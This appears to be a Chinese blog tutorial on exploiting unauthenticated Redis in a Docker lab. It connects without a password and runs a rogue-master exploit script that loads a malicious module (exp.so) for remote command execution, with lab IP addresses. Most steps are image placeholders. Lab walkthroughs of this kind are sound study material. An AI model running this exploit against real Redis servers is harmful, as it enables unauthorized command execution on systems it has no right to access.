Redis未授权访问漏洞实战

        Redis未授权访问漏洞实战

Redis 介绍

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

Redis 数据库经常用于Web 应用的缓存。

Redis 可以与文件系统进行交互。

Redis 监听TCP/6379

redis 简单使用,未设置密码,客户端工具可以之间连接

  1. docker 启动环境

Redis未授权访问漏洞实战_第1张图片

sudo docker-compose up -d

  1. 免密直接连接

  1. 写入内容

Redis未授权访问漏洞实战_第2张图片

Redis未授权访问漏洞实战_第3张图片

Redis 未授权访问

写入shell

sudo docker exec -it 254b97a02d42  /bin/bash

Redis未授权访问漏洞实战_第4张图片

exp利用

下载

Redis未授权访问漏洞实战_第5张图片

编译

Redis未授权访问漏洞实战_第6张图片

python3 redis-master.py -r 192.168.135.143 -p 6379 -L 192.168.135.143 -P 8888 -f RedisModulesSDK/exp.so -c "id" 

Redis未授权访问漏洞实战_第7张图片

命令执行成功

你可能感兴趣的:(安全,网络安全,网络)